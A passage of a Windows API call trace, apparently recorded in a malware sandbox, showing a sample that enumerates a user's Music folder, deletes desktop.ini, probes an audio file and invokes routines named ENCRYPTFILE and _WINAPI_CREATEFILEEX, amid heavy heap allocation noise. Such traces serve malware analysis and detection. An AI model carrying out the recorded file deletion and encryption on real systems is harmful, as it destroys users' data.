[0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0110.142] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac540 [0110.142] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\desktop.ini")) returned 1 [0110.159] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0110.159] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0110.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0110.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0110.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0110.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0110.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0110.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0110.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0110.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0110.159] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0110.159] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9a10 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0110.160] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0110.160] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0110.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0110.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0110.160] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0110.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0110.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0110.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0110.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0110.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0110.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0110.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9a10 [0110.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0110.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0110.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0110.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0110.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0110.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0110.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0110.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0110.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0110.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b78 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0110.161] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0110.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0110.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0110.161] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0110.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0110.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.162] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\fR5QK.wav", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cde5630, ftCreationTime.dwHighDateTime=0x1d5e3fd, ftLastAccessTime.dwLowDateTime=0xe537d520, ftLastAccessTime.dwHighDateTime=0x1d5e3cd, ftLastWriteTime.dwLowDateTime=0xe537d520, ftLastWriteTime.dwHighDateTime=0x1d5e3cd, nFileSizeHigh=0x0, nFileSizeLow=0xe295, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="fR5QK.wav", cAlternateFileName="")) returned 0x41ac440 [0110.162] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0110.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0110.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0110.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0110.162] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0110.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0110.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0110.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c80 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0110.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0110.163] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0110.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0110.163] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0110.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0110.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0110.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0110.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0110.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0110.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d58 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0110.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0110.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0110.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0110.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0110.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0110.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0110.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0110.165] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0110.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0110.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0110.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0110.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0110.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, 